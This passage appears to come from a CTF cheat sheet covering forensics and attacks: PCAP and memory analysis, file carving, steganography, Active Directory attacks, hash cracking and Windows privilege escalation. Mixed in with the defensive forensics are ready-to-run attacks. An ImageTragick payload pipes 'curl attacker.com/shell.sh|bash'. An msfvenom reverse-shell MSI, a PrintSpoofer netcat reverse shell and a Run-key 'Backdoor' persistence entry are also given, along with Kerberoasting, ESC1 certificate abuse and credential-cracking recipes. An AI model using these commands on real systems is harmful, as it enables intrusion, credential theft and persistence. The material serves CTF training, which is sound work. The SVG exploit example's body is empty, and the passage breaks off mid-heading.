3: Extract FTP Credentials and File Transfers\n\n```bash\n# FTP is plaintext \u2014 find login credentials\ntshark -r capture.pcap -Y \"ftp\" -T fields -e ftp.request.command -e ftp.request.arg 2&gt;/dev/null\n\n# Output:\n# USER administrator\n# PASS supersecret\n# RETR flag.txt                   \u2190 Attacker downloaded flag.txt\n\n# Find FTP file downloads (get actual data)\ntshark -r capture.pcap -Y \"ftp-data\" -T fields -e ftp-data 2&gt;/dev/null | head -20\n\n# If flag.txt was transferred, find the FTP data channel\n# First find which IP is the FTP server\ntshark -r capture.pcap -Y \"ftp\" -T fields -e ip.src -e ftp.request.command 2&gt;/dev/null | grep \"227\\|230\"\n```\n\n#### Example 4: Extract DNS Queries (find C2 domains)\n\n```bash\n# Get all DNS queries (shows what domains the victim resolved)\ntshark -r capture.pcap -Y \"dns\" -T fields -e dns.qry.name -e dns.a 2&gt;/dev/null\n\n# Output:\n# google.com           | 142.250.185.206\n# evilc2.badguys.com   | 192.168.1.100    \u2190 Suspicious!\n\n# Find suspicious DNS (long random subdomains = malware C2)\ntshark -r capture.pcap -Y \"dns.qry.name\" -T fields -e dns.qry.name 2&gt;/dev/null | awk 'length &gt; 40'\n\n# Find DNS queries to suspicious TLDs (.xyz, .top, .pw)\ntshark -r capture.pcap -Y \"dns\" -T fields -e dns.qry.name 2&gt;/dev/null | grep -E \"\\.(xyz|top|pw|cc|xyz|click)$\"\n```\n\n#### Example 5: Extract Files from HTTP Traffic\n\n```bash\n# Export all HTTP objects (images, downloads, files)\ntshark -r capture.pcap --export-objects \"http,./http_export/\" 2&gt;/dev/null\nls ./http_export/\n\n# Then grep through exported files for the flag\ngrep -r \"RTARF{\" ./http_export/ 2&gt;/dev/null\n\n# Or extract a specific file by reassembling TCP stream\n# First find the frame number of the download\ntshark -r capture.pcap -Y \"http.request.uri contains 'flag'\" -T fields -e frame.number 2&gt;/dev/null\n# Then use follow to reassemble:\ntshark -r capture.pcap -Y \"frame.number == 12345\" --follow tcp-stream -0 &gt; downloaded_file.bin\n```\n\n#### Example 6: Find Plaintext Passwords in Any Protocol\n\n```bash\n# Search entire pcap for password strings\ntshark -r capture.pcap -T fields -e data.text 2&gt;/dev/null | grep -i \"password\"\n\n# Or search raw data\ntshark -r capture.pcap -Y \"data\" -T fields -e data 2&gt;/dev/null | grep -i \"password\\|passwd\"\n\n# Find SMTP/IMAP/POP3 email credentials\ntshark -r capture.pcap -Y \"smtp or imap or pop\" -T fields -e data.text 2&gt;/dev/null | grep -i \"login\\|password\"\n```\n\n#### Example 7: Reconstruct Full HTTP Session\n\n```bash\n# Get a specific HTTP stream (e.g., login to admin panel)\ntshark -r capture.pcap -Y \"http.request.uri contains 'login'\" --follow tcp-stream -0 2&gt;/dev/null\n\n# Output shows full HTTP request + response:\n# GET /admin/login.php HTTP/1.1\n# Host: admin.example.com\n# Cookie: PHPSESSID=abc123\n#\n# HTTP/1.1 200 OK\n# Set-Cookie: admin=loggedin\n```\n\n### PCAP Analysis Quick Wins\n\n| What You Want | Command |\n|--------------|---------|\n| All HTTP URLs | `tshark -r file.pcap -Y \"http.request\" -T fields -e http.request.uri` |\n| HTTP POST data (logins) | `tshark -r file.pcap -Y \"http.request.method == POST\" -T fields -e http.file_data` |\n| FTP credentials | `tshark -r file.pcap -Y \"ftp\" -T fields -e ftp.request.command` |\n| DNS queries | `tshark -r file.pcap -Y \"dns\" -T fields -e dns.qry.name` |\n| Exported HTTP files | `tshark -r file.pcap --export-objects \"http,./export/\"` |\n| Network conversations | `tshark -r file.pcap -qz conv,ip` |\n| Top talkers | `tshark -r file.pcap -qz io,phs` |\n\n---\n\n## 4. Memory Forensics (Volatility)\n\n### What is Memory Forensics?\n\nExtracting artifacts from RAM dumps. A memory image contains decryption keys, passwords, running processes, network connections, and cached data that don't exist on disk.\n\n**When to use:**\n- CTF gives you a `.dmp` or `.mem` file\n- Target was running malware and you need to analyze it\n- You need passwords cached in memory\n- You need to find hidden processes (rootkits)\n- You need to extract encryption keys\n\n### Volatility 3 (Python 3, modern)\n\n```bash\n# Install\npip install volatility3\ngit clone https://github.com/volatilityfoundation/volatility3.git\ncd volatility3 &amp;&amp; python3 setup.py install\n\n# Basic syntax\nvol -f memory.dmp windows.pslist    # List processes\nvol -f memory.dmp windows.psscan    # Find hidden processes\nvol -f memory.dmp windows.hashdump  # Dump password hashes\n```\n\n#### Example 1: Find Running Processes (what was running when)\n\n```bash\n# List all processes\nvol -f memory.dmp windows.pslist\n\n# Output:\n# PID   PPID  ImageFileName          Offset\n# 4     0     System                0x1a4c000\n# 488   4     svchost.exe           0x2a3c000\n# 912   780   cmd.exe              0x4b5000   \u2190 Attacker shell\n# 1100  912   conhost.exe          0x4c1000\n\n# Find suspicious processes (look for fake/masquerading names)\nvol -f memory.dmp windows.pslist | grep -i \"cmd\\|powershell\\|vnc\\|netcat\\|nc\\|backdoor\"\n\n# Find hidden/injected processes (psscan finds processes that pslist misses)\nvol -f memory.dmp windows.psscan | grep -i \"powershell\"\n```\n\n#### Example 2: Extract Password Hashes (if you have SYSTEM hive)\n\n```bash\n# Dump Windows password hashes (SAM + SYSTEM required, usually in memory)\nvol -f memory.dmp windows.hashdump\n\n# Output:\n# Administrator:500:aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99:::\n# Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n\n# Then crack with hashcat:\n# hashcat -m 1000 hash.txt wordlist.txt\n```\n\n#### Example 3: Find Network Connections (was it connected to C2?)\n\n```bash\n# Show active network connections at time of dump\nvol -f memory.dmp windows.netscan\n\n# Output:\n# Proto  Local Address          Remote Address         State        PID\n# TCP    192.168.1.100:443     10.0.0.5:4444          ESTABLISHED  4124  \u2190 Suspicious!\n\n# Also check for listening ports\nvol -f memory.dmp windows.netscan | grep \"LISTENING\"\n```\n\n#### Example 4: Extract Clipboard Contents (attacker may have copied passwords)\n\n```bash\nvol -f memory.dmp windows.clipboard\n\n# Output:\n# Session 0:\n# Text: C:\\Users\\admin\\Documents\\secret.txt\n# Text: SuperSecretPassword123!\n```\n\n#### Example 5: Extract PowerShell Command History\n\n```bash\n# Get PowerShell command history (commands typed in PowerShell)\nvol -f memory.dmp windows.powershell\n\n# Also check for PowerShell script blocks (full scripts stored in memory)\nvol -f memory.dmp windows.powershell -v\n```\n\n#### Example 6: Find Injected Code (malware hiding in legitimate process)\n\n```bash\n# Find memory regions with injected code (MZ header in wrong place)\nvol -f memory.dmp windows.malfind\n\n# Output:\n# PID  Process  Start  End  Region  Protect  Description\n# 1234 explorer  0x2a   0x3b  Private  RWX     MZ header found\n\n# Dump suspicious memory regions for analysis\nvol -f memory.dmp windows.malfind --dump-dir ./dumps/\n```\n\n#### Example 7: Extract Registry Hives (find persistence)\n\n```bash\n# List registry hives in memory\nvol -f memory.dmp windows.registry.hives\n\n# Read a specific registry key (Run key persistence)\nvol -f memory.dmp windows.registry.printkey \\\n    --key \"Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\"\n\n# Look for persistence entries added by attacker\nvol -f memory.dmp windows.registry.printkey \\\n    --key \"Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\"\n```\n\n### Volatility Quick Reference\n\n| Command | What It Shows |\n|---------|--------------|\n| `vol -f file.dmp windows.pslist` | Running processes |\n| `vol -f file.dmp windows.psscan` | Hidden/terminated processes |\n| `vol -f file.dmp windows.netscan` | Network connections |\n| `vol -f file.dmp windows.hashdump` | Password hashes |\n| `vol -f file.dmp windows.clipboard` | Clipboard contents |\n| `vol -f file.dmp windows.powershell` | PowerShell history |\n| `vol -f file.dmp windows.malfind` | Injected code |\n| `vol -f file.dmp windows.dlllist -p PID` | DLLs loaded by process |\n| `vol -f file.dmp windows.cmdline` | Process command lines |\n| `vol -f file.dmp windows.envvar` | Environment variables |\n\n---\n\n## 5. Active Directory / LDAP\n\n### When to Use AD Commands\n\nIn Windows-focused CTFs involving Active Directory. Attacking AD = gaining domain-wide control.\n\n**Key concepts:**\n- **LDAP**: Protocol for querying AD (port 389, 636)\n- **Kerberos**: Authentication protocol (port 88)\n- **SMB/DFS**: File sharing (port 445)\n- **SPN**: Service Principal Name (attached to service accounts for Kerberos)\n- **AS-REP**: Authentication Service Reply (can be cracked if pre-auth disabled)\n- **TGS**: Ticket Granting Service (Kerberoastable tickets)\n\n### Example 1: Enumerate AD Users with ldapsearch\n\n```bash\n# Install\napt-get install ldap-utils\n\n# Anonymous bind (if LDAP allows)\nldapsearch -x -h 192.168.1.10 -b \"DC=corp,DC=local\"\n\n# Get all users\nldapsearch -x -H ldap://192.168.1.10 \\\n  -b \"DC=corp,DC=local\" \\\n  -D \"CN=admin,CN=Users,DC=corp,DC=local\" \\\n  -w 'password123' \\\n  '(objectClass=user)' \\\n  sAMAccountName userPrincipalName\n\n# Find disabled accounts\nldapsearch -x -H ldap://192.168.1.10 \\\n  -b \"DC=corp,DC=local\" \\\n  -D \"CN=admin,CN=Users,DC=corp,DC=local\" \\\n  -w 'password123' \\\n  '(&amp;(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))' \\\n  sAMAccountName\n```\n\n#### Example 2: Find Kerberoastable Users (SPN Users)\n\n```bash\n# Users with SPN = service accounts = Kerberoastable targets\nldapsearch -x -H ldap://192.168.1.10 \\\n  -b \"DC=corp,DC=local\" \\\n  -D \"CN=admin,CN=Users,DC=corp,DC=local\" \\\n  -w 'password123' \\\n  '(&amp;(objectClass=user)(servicePrincipalName=*))' \\\n  sAMAccountName servicePrincipalName\n\n# Output:\n# sAMAccountName: mssql_svc\n# servicePrincipalName: MSSQLSvc/dbserver.corp.local:1433\n#                   \u2190 This account is used by SQL Server\n\n# Then crack the TGS ticket offline:\n# Get the ticket with GetUserSPNs.py, then hashcat -m 13100\n```\n\n#### Example 3: Find AS-REP Roastable Users (No Pre-Auth Required)\n\n```bash\n# Users with UF_DONT_REQUIRE_PREAUTH can have their AS-REP hash cracked\nldapsearch -x -H ldap://192.168.1.10 \\\n  -b \"DC=corp,DC=local\" \\\n  -D \"CN=admin,CN=Users,DC=corp,DC=local\" \\\n  -w 'password123' \\\n  '(&amp;(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' \\\n  sAMAccountName\n\n# Then crack with hashcat -m 18200\n```\n\n#### Example 4: BloodHound Data Collection\n\n```bash\n# On Kali, use BloodHound.py (no Windows needed)\npip install bloodhound\nbloodhound-python -c all \\\n  -u 'admin' -p 'password123' \\\n  -d corp.local \\\n  -dc 192.168.1.10\n\n# This creates JSON files in current directory:\n# computers.json, users.json, groups.json, trusts.json, sessions.json\n\n# Then open BloodHound GUI:\n# apt install bloodhound\n# bloodhound\n\n# Import the JSONs and query:\n# - Shortest path to Domain Admin\n# - Users with DCSync rights\n# - Kerberoastable users\n# - AS-REP roastable users\n```\n\n#### Example 5: Kerberoasting (Get TGS Ticket, Crack Offline)\n\n```bash\n# Using Impacket's GetUserSPNs\npython3 GetUserSPNs.py \\\n  -request \\\n  -dc-ip 192.168.1.10 \\\n  corp.local/admin:password123\n\n# Output:\n# Service: MSSQLSvc/dbserver.corp.local:1433\n# Hash: $krb5tgs$23$*user$realm$spn*hash:timestamp\n\n# Save hash and crack with hashcat:\nhashcat -m 13100 ticket.txt /usr/share/wordlists/rockyou.txt\n# or\njohn --format=krb5tgs ticket.txt --wordlist=rockyou.txt\n```\n\n### AD Attack Summary\n\n| Attack | When to Use | Tool |\n|--------|-------------|------|\n| LDAP Enum | Find users, groups, computers | `ldapsearch` |\n| Kerberoasting | Crack service account passwords | `GetUserSPNs.py` + hashcat |\n| AS-REP Roast | Crack passwords of users with no pre-auth | `GetNPUsers.py` + hashcat |\n| Pass-the-Hash | Authenticate with NTLM hash | `wmiexec.py`, `psexec.py` |\n| Golden Ticket | Forge Kerberos TGT with krbtgt hash | `ticketer.py` |\n| DCSync | Dump all domain hashes | `secretsdump.py` |\n| BloodHound | Map attack paths in AD | `bloodhound-python` |\n\n---\n\n## 6. File Carving &amp; Recovery\n\n### What is File Carving?\n\nExtracting files from raw disk images, memory dumps, or network captures without relying on filesystem metadata. Uses file signatures (magic bytes) to find and extract.\n\n**When to use:**\n- Files were deleted but raw image exists\n- A file is hidden inside another file (steganography)\n- You need to extract images/documents from PCAP\n- Disk image has corrupted filesystem\n\n### Example 1: Extract Files from Disk Image with binwalk\n\n```bash\n# Install\napt-get install binwalk\n\n# Find all embedded files in image\nbinwalk image.dd\n\n# Output:\n# DECIMAL       HEXADECIMAL     DESCRIPTION\n# 0             0x0             Linux filesystem data (ext4)\n# 512           0x200           JPEG image data\n# 1048576       0x100000        ZIP archive\n\n# Automatically extract all found files\nbinwalk -e image.dd\n# Creates _image.dd.extracted/ with:\n# 0.ext2/  (Linux filesystem)\n# 200.jpg/  (JPEG that was found at offset 512)\n# 100000.zip/  (ZIP at offset 1048576)\n\n# Extract specific type only\nbinwalk -e --dd='jpg:jpg' image.dd\n```\n\n#### Example 2: Carve JPEG with foremost\n\n```bash\n# Install\napt-get install foremost\n\n# Carve all JPEG files from disk image\nforemost -t jpg -i disk_image.dd -o carved_jpgs/\n\n# Carve multiple types at once\nforemost -t all -i disk_image.dd -o carved_output/\n\n# List what foremost found\nforemost -v -t jpg -i disk_image.dd 2&gt;&amp;1 | grep \"Files Header\" \n```\n\n#### Example 3: Carve with scalpel (faster, configurable)\n\n```bash\n# Install\napt-get install scalpel\n\n# Configure scalpel.conf (edit /etc/scalpel/scalpel.conf or create local)\n# Example config for images and documents:\ncat &gt; scalpel.conf &lt;&lt; 'EOF'\njpg     y       20000000        %08d.jpg\npng     y       20000000        %08d.png\nzip     y       10000000        %08d.zip\npdf     y       5000000         %08d.pdf\ndoc     y       1000000         %08d.doc\nmp3     y       10000000        %08d.mp3\nEOF\n\n# Run scalpel\nscalpel -c scalpel.conf -i disk_image.dd -o carved/\nls carved/  # Shows jpg-*-0/, png-*-0/, etc.\n```\n\n#### Example 4: Extract Files from PCAP (network forensics)\n\n```bash\n# Export all HTTP objects from PCAP (images, downloads, etc.)\ntshark -r capture.pcap --export-objects \"http,./http_files/\"\n\n# Export SMB files\ntshark -r capture.pcap --export-objects \"smb,./smb_files/\"\n\n# Extract FTP files (FTP transfers data in clear)\ntshark -r capture.pcap -Y \"ftp-data\" -T fields -e ftp-data &gt; extracted.bin\n\n# Find embedded files in raw PCAP with binwalk\nbinwalk capture.pcap\n\n# Extract all files from PCAP\nbinwalk -e capture.pcap\n```\n\n#### Example 5: Find Flag in Carved Files\n\n```bash\n# After carving, search all extracted files for flag\ngrep -r \"RTARF{\" carved/ 2&gt;/dev/null\nfind carved/ -type f -exec grep -l \"flag{\" {} \\; 2&gt;/dev/null\n\n# Search images for flag text (some CTFs embed flag in image metadata)\nexiftool carved/*.jpg 2&gt;/dev/null | grep -i \"comment\\|description\"\n\n# Extract strings from binary files\nstrings carved/image.jpg | grep -E \"RTARF|flag{|CTF{\"\n```\n\n#### Example 6: Extract NTFS Alternate Data Streams (ADS)\n\n```bash\n# On Windows, NTFS files can have hidden streams\n# Attacker may hide data in ADS\n\n# Find files with ADS (on Windows)\ndir /r /s C:\\ 2&gt;nul | find \":$DATA\"\n\n# Read ADS content\nmore &lt; filename:streamname\n\n# On Linux, use ADS tools\napt-get install ntfs-3g\n# Or parse raw disk image for :$DATA patterns\nstrings disk.img | grep -E \":\\$DATA|\\.txt:\"\n\n# Find hidden data in ZIP files (sometimes flag is hidden in metadata)\nzipinfo secret.zip\nunzip -l secret.zip\n```\n\n### File Signature Reference (Magic Bytes)\n\n| File Type | Magic Bytes (Hex) | Extensions |\n|-----------|------------------|-----------|\n| JPEG | FF D8 FF | .jpg, .jpeg |\n| PNG | 89 50 4E 47 | .png |\n| ZIP | 50 4B 03 04 | .zip, .docx, .xlsx |\n| PDF | 25 50 44 46 | .pdf |\n| GIF | 47 49 46 38 | .gif |\n| MP3 | 49 44 33 | .mp3 |\n| MP4 | 00 00 00 18 66 74 | .mp4 |\n| RAR | 52 61 72 21 | .rar |\n| 7Z | 37 7A BC AF | .7z |\n| TAR | 75 73 74 61 72 | .tar |\n| ELF | 7F 45 4C 46 | (no ext, binaries) |\n\n---\n\n## 7. Hash Cracking &amp; Passwords\n\n### When to Crack Hashes\n\nYou have a hash and need the original password. CTF hashes are almost always crackable with wordlists.\n\n### Example 1: Identify Hash Type\n\n```bash\n# Install hash-identifier\npip install hash-identifier\nhash-identifier\n\n# Or manually identify by length and format:\n# MD5: 32 hex chars = 128 bits\n# SHA1: 40 hex chars = 160 bits\n# SHA256: 64 hex chars = 256 bits\n# bcrypt: starts with $2a$, $2b$, $2y$ (expensive, slow)\n# NTLM: 32 hex chars (Windows passwords)\n# NetNTLMv2: MACHINENAME::DOMAIN:hash:hash (captured from network)\n\n# If format is $algo$salt$hash \u2192 salted hash (need algo-specific mode)\n```\n\n#### Example 2: Crack NTLM (Windows Password)\n\n```bash\n# Format of NTLM hash from /etc/shadow orSAM dump:\n# administrator:1000:aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99:::\n\n# Extract only the hash part (LM:NT hash)\necho \"5f4dcc3b5aa765d61d8327deb882cf99\" &gt; ntlm.txt\n\n# Crack with hashcat (mode 1000 = NTLM)\nhashcat -m 1000 ntlm.txt /usr/share/wordlists/rockyou.txt\n\n# Or with john\njohn --format=ntlm ntlm.txt --wordlist=/usr/share/wordlists/rockyou.txt\n\n# Show result\nhashcat -m 1000 ntlm.txt --show\n```\n\n#### Example 3: Crack Kerberos TGS (Kerberoasting)\n\n```bash\n# Format: $krb5tgs$23$*user$realm$spn*hash:timestamp\n# Save to file like:\n# $krb5tgs$23$*mssql_svc$CORP.LOCAL$MSSQLSvc/dbserver.corp.local:1433*\n\n# Crack with hashcat mode 13100\nhashcat -m 13100 ticket.txt /usr/share/wordlists/rockyou.txt\n\n# Or with john\njohn --format=krb5tgs ticket.txt --wordlist=rockyou.txt\n```\n\n#### Example 4: Crack AS-REP (AS-REP Roasting)\n\n```bash\n# Format from GetNPUsers.py:\n# $krb5asrep$23$user@CORP.LOCAL:hash\n\n# Crack with hashcat mode 18200\nhashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt\n```\n\n#### Example 5: Crack ZIP Password\n\n```bash\n# Use fcrackzip (fast)\nfcrackzip -u -D -p rockyou.txt secret.zip\n\n# -u = try decompress (verifies password)\n# -D = use dictionary\n# -p = password file\n\n# Or use john (zip2john to convert)\nzip2john secret.zip &gt; hash.txt\njohn --format=zip hash.txt --wordlist=rockyou.txt\n\n# Extract with found password\nunzip -P password secret.zip\n```\n\n#### Example 6: Crack SSH Key Passphrase\n\n```bash\n# Convert SSH private key to john format\npython3 /usr/share/john/ssh2john.py id_rsa &gt; hash.txt\n\n# Crack\njohn --wordlist=rockyou.txt hash.txt\n\n# Use with SSH\nssh -i id_rsa -o PASSWD=crackedpassword user@host\n```\n\n### Hashcat Modes Quick Reference\n\n| Mode | Hash Type | Example |\n|------|-----------|---------|\n| 0 | MD5 | `5f4dcc3b5aa765d61d8327deb882cf99` |\n| 100 | SHA1 | `5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8` |\n| 1400 | SHA256 | `e3b0c44298fc1c149afbf4c8996fb924...` |\n| 1000 | NTLM | Windows password hashes |\n| 13100 | Kerberos TGS | `$krb5tgs$23$*...` |\n| 18200 | AS-REP | `$krb5asrep$23$...` |\n| 5600 | NetNTLMv2 | `user::domain:hash:hash` |\n| 3200 | bcrypt | `$2a$...` |\n\n---\n\n## 8. Image Steganography\n\n### What is Steganography?\n\nHiding data inside images. The flag might be invisible to the eye but embedded in pixel values, EXIF data, or image structure.\n\n**When to use:**\n- An image file exists in a CTF challenge\n- The flag seems to be \"hidden\" but you can't see it\n- Image looks normal but is suspiciously large\n\n### Example 1: Extract from JPEG (EOF Hidden File)\n\n```bash\n# Check if there's a hidden file appended after JPEG\ncat image.jpg\n# If you see \"PK\" (ZIP header) or \"504b\" after the JPEG end marker (FF D9),\n# there's a ZIP embedded\n\n# Use binwalk to find and extract\nbinwalk -e image.jpg\n\n# Or manually:\n# Find where JPEG ends\ntail -c 100 image.jpg | xxd\n# If you see PK (ZIP) or other file signatures after FFD9, extract\n```\n\n#### Example 2: Steghide (Most Common CTF Tool)\n\n```bash\n# Install\napt-get install steghide\n\n# Extract hidden data (no password)\nsteghide extract -sf image.jpg\nsteghide extract -sf image.jpg -p \"\"  # empty password\n\n# Try common passwords\nsteghide extract -sf image.jpg -p \"password\"\nsteghide extract -sf image.jpg -p \"secret\"\n\n# Get info about embedded data\nsteghide info image.jpg\n```\n\n#### Example 3: Stegseek (Fast steghide cracking)\n\n```bash\n# Install\napt-get install steghide\n# or build from source:\n# git clone https://github.com/RickdeJager/stegseek.git\n# cd stegseek &amp;&amp; make\n\n# Crack steghide password with wordlist\nstegseek image.jpg rockyou.txt\n\n# Output:\n# Cover file: image.jpg\n# Embedded file: secret.txt\n# Cracking time: 5 seconds\n# Password found: \"admin123\"\n```\n\n#### Example 4: zsteg (PNG/RGBA images)\n\n```bash\n# Install\ngem install zsteg\n\n# Detect hidden data in PNG\nzsteg image.png\n\n# Try all known methods\nzsteg -a image.png\n\n# Extract specific channel\nzsteg -E \"b1,lsb,xy\" image.png &gt; extracted.bin\n# b1 = first bit plane, lsb = least significant bit, xy = spatial method\n\n# Try brute force all combinations\nzsteg image.png --all\n```\n\n#### Example 5: exiftool (EXIF Metadata)\n\n```bash\n# Install\napt-get install libimage-exiftool-perl\n\n# Read all metadata (may contain flag in comments)\nexiftool image.jpg\n\n# Look for:\n# Comment: Contains flag\n# Artist: RTARF{...}\n# XMP: May contain embedded XML with flag\n\n# Remove/sanitize metadata\nexiftool -Comment=\"\" image.jpg\n```\n\n#### Example 6: ImageTragick (CVE-2016-3718, ImageMagick RCE)\n\n```bash\n# If website uses ImageMagick to process uploaded images, check for RCE\n\n# Create malicious image\ncat &gt; exploit.mvg &lt;&lt; 'EOF'\npush graphic-context\nviewbox 0 0 640 480\nfill 'url(https://example.com/image.jpg\"|curl attacker.com/shell.sh|bash\")'\npop graphic-context\nEOF\n\n# Or use SVG with embedded shell command\ncat &gt; exploit.svg &lt;&lt; 'EOF'\n\n\n\n\nEOF\n\n# Upload as profile picture\n```\n\n### Steganography Quick Reference\n\n| Tool | Best For | Installation |\n|------|----------|-------------|\n| `steghide` | JPEG with steganography | `apt install steghide` |\n| `stegseek` | Crack steghide passwords | build from git |\n| `zsteg` | PNG/RGBA bit plane analysis | `gem install zsteg` |\n| `binwalk` | Embedded file detection | `apt install binwalk` |\n| `exiftool` | EXIF metadata | `apt install libimage-exiftool-perl` |\n| `strings` | Find text in images | built-in |\n| `foremost` | Carve files from images | `apt install foremost` |\n\n---\n\n## 9. Windows Privilege Escalation\n\n### When to Escalate\n\nYou have a low-privilege shell on Windows. You need SYSTEM or Administrator to read sensitive files or get the flag.\n\n**Common CTF patterns:**\n- Service binaries with weak permissions\n- Registry Run keys (persistence + privilege)\n- Misconfigured services (unquoted paths, writable services)\n- AlwaysInstallElevated policy\n- SeImpersonatePrivilege (token kidnapping)\n\n### Example 1: Find Weak Service Permissions\n\n```bash\n# From command prompt on target\nsc query\nwmic service list brief\n\n# Check if you can modify a service\nicacls \"C:\\Program Files\\Service.exe\"\n\n# If \"BUILTIN\\Users\" or \"Everyone\" has (F) or (M) on service binary \u2192 easy privesc\n# icacls output:\n# BUILTIN\\Users:(F)     \u2190 Full control, EASY WIN\n# Everyone:(M)          \u2190 Modify, EASY WIN\n\n# Exploit: Replace service binary with your payload\ncopy payload.exe \"C:\\Program Files\\Service.exe\"\nnet start ServiceName\n```\n\n#### Example 2: Unquoted Service Paths\n\n```bash\n# If service path has spaces and no quotes:\n# C:\\Program Files\\Custom App\\app.exe\n\n# Windows tries to execute in order:\n# C:\\Program.exe                      \u2190 Might exist and be writable!\n# C:\\Program Files\\Custom.exe         \u2190 Might exist!\n# C:\\Program Files\\Custom App\\app.exe  \u2190 Legitimate path\n\n# Check all services for unquoted paths\nwmic service get name,pathname,startname\n\n# If you find: C:\\Program Files\\My App\\bin\\server.exe\n# Check if you can write to C:\\Program.exe or C:\\Program Files\\My.exe\nicacls C:\\Program.exe\nicacls \"C:\\Program Files\\My.exe\"\n```\n\n#### Example 3: AlwaysInstallElevated (MSI as SYSTEM)\n\n```bash\n# Check if policy allows installing MSI as SYSTEM\nreg query \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\" /v AlwaysInstallElevated\nreg query \"HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\" /v AlwaysInstallElevated\n\n# If both return 1 (enabled):\n# Generate malicious MSI\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n    LHOST=10.0.0.1 LPORT=4444 \\\n    -f msi -o payload.msi\n\n# Execute as SYSTEM\nmsiexec /quiet /qn /i C:\\temp\\payload.msi\n\n# Get meterpreter shell as SYSTEM\n```\n\n#### Example 4: SeImpersonatePrivilege (Juicy Potato/Rogue Potato)\n\n```bash\n# Check if you have SeImpersonatePrivilege\nwhoami /priv\n\n# If SeImpersonatePrivilege is enabled:\n# Download Juicy Potato (for older Windows) or PrintSpoofer (for Windows 10/Server 2019+)\n\n# On Kali, download:\nwget https://github.com/antonioCoco/JuicyPotato/releases/download/v1.1/JuicyPotato.exe\n\n# Or PrintSpoofer:\nwget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer.exe\n\n# On target, exploit:\nPrintSpoofer.exe -c \"cmd.exe /c whoami\"\n# Should return: nt authority\\system\n\n# Get reverse shell as SYSTEM:\nPrintSpoofer.exe -c \"nc.exe -e cmd.exe 10.0.0.1 4444\"\n```\n\n#### Example 5: Registry Run Key Persistence + Escalation\n\n```bash\n# Check current user's Run keys (persistence)\nreg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nreg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\n\n# If you can write to any of these, add a malicious entry\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" \\\n    /v \"Backdoor\" /t REG_SZ \\\n    /d \"C:\\temp\\nc.exe -e cmd.exe 10.0.0.1 4444\" /f\n\n# When user logs in, you get shell\n# This also works for privesc if the Run key is in HKLM (system-wide)\n# and the user can restart a service\n```\n\n#### Example 6: Find Stored Passwords on Windows\n\n```bash\n# Check for passwords in registry (often used by installers)\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\"\nreg query \"HKCU\\Software\\ORL\\WinVNC4\\Password\"\n\n# Find in SAM hive (if system was booted and you have SYSTEM hive)\n# Use creddump or saminside\n\n# Check for saved credentials\ncmdkey /list\n\n# Check for unattend.xml (answer file with embedded password)\ntype C:\\Windows\\Panther\\unattend.xml | findstr /i \"password\"\n\n# Check for other config files\ndir /s /b C:\\*.xml C:\\*.ini C:\\*.cfg 2&gt;nul | xargs grep -l \"password\" 2&gt;nul\n```\n\n### Windows PrivEsc Quick Reference\n\n| Technique | When It Works | How to Check |\n|-----------|---------------|-------------|\n| Weak Service Binaries | Everyone can modify service exe | `icacls service.exe` |\n| Unquoted Paths | Path has spaces, no quotes | `wmic service get pathname` |\n| AlwaysInstallElevated | Policy enabled in registry | `reg query ... AlwaysInstallElevated` |\n| SeImpersonatePrivilege | Token priv available | `whoami /priv` |\n| Stored Passwords | Password in registry/files | `reg query ... password` |\n| DLL Hijacking | App searches PATH for DLL | Check PATH + vulnerable app |\n| Startup Persistence | Can write to startup folder/registry | Check Run keys |\n\n---\n\n## 10. AD CS &amp; Kerberos Attacks\n\n### What are AD CS Attacks?\n\nActive Directory Certificate Services attacks abuse Microsoft's PKI to request certificates that grant domain privileges. Very powerful in modern Windows environments.\n\n### Example 1: Find AD CS Servers and Certificate Templates\n\n```bash\n# Find certificate authorities\nnmap -p 389,636,3268,3269 --script ldap-search 192.168.1.10\n\n# Enumerate certificate templates with ldapsearch\nldapsearch -x -H ldap://192.168.1.10 \\\n  -b \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=corp,DC=local\" \\\n  -D \"CN=admin,CN=Users,DC=corp,DC=local\" \\\n  -w 'password' \\\n  '(objectClass=pKICertificateTemplate)' \\\n  cn pKIExpirationPeriod msPKI-Cert-Template-Name\n\n# Look for vulnerable templates:\n# - UserSuppliedSan (SAN can be set by requester)\n# - enrollee-supplies-subject\n# - No security extension required\n```\n\n#### Example 2: ESC1 - SAN Abuse (Request Certificate for Any User)\n\n```bash\n# If template allows SAN (EDITF_ATTRIBUTESUBJECTALTNAME2)\n# You can request certificate for any user (e.g., Domain Admin)\n\n# Using Certify (Windows)\nCertify.exe request /ca:corp-DC-CA /template:CorpUser /altname:administrator\n\n# On Kali, use certipy\ncertipy-ad req -ca corp-DC-CA -template CorpUser -u user@corp.local -p password -altname administrator@corp.local\n\n# Then authenticate with the certificate:\ncertipy-ad auth -pfx admin.pfx\n# Now you're Domain Admin!\n```\n\n#### Example 3: Kerberoasting (Crack Service Account Passwords)\n\n```bash\n# Find SPN users\npython3 GetUserSPNs.py \\\n  -dc-ip 192.168.1.10 \\\n  corp.local/admin:password123\n\n# Request TGS for each SPN\npython3 GetUserSPNs.py \\\n  -request \\\n  -dc-ip 192.168.1.10 \\\n  corp.local/admin:password123\n\n# Save cracked hash:\n# $krb5tgs$23$*mssql_svc$corp.local$MSSQLSvc/dbserver.corp.local:1433*\n\n# Crack with hashcat\nhashcat -m 13100 ticket.txt rockyou.txt\n\n# If cracked \u2192 you have service account password\n# Often service accounts have excessive privileges\n```\n\n#### Example 4: 